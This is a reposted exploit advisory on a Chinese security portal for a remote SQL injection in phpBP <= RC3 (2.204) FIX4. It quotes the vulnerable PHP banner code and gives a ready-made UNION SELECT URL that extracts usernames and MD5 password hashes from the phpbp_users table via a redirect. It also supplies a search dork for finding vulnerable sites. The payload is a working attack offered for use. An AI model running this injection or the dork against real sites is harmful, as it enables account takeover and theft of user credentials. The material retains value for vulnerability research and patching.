首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability


http://www.gipsky.com/
.-----------------------------------------------------------------------------.
| vuln.: phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability |
| download: http://www.phpbp.com/ |
| dork: "PHP BP Team" |
| |
| author: irk4z@yahoo.pl |
| homepage: http://irk4z.wordpress.com/ |
| |
| - HACKBOX.pl <--- |
| |
| greets to: cOndemned, str0ke, wacky |
'-----------------------------------------------------------------------------'

# code:

./includes/functions/banners-external.php:
...
3 function banner_out() //zlicza ilosc klikniec na banner
4 {
5 global $conf;
6
7 if($_GET['id'])
8 {
9 SQLvalidate($_POST['id']);
10
11 $db = new dbquery;
12 $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__);
13
14 if($db->num_rows()==0)
15 {
16 redirect('index.php?module=error?error=banners_error2');
17 exit;
18 }
19
20 $d=$db->fetch_object();
21 $db->query("UPDATE $conf[prefix]banners SET views=views 1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__);
22
23 redirect($d->url);
24 }
25
26 exit;
27 }
...

# exploit:

http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*

you will be redirect to http://[login]_[md5_hash_pass] (ex. http://admin_21232f297a57a5a743894a0e4a801fc3/)

[2008-03-16]
<< Mutiple Timesheets <= 5.0 Multiple Remote Vulnerabilities CA BrightStor ARCserve Backup r11.5 ActiveX Remote BOF Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8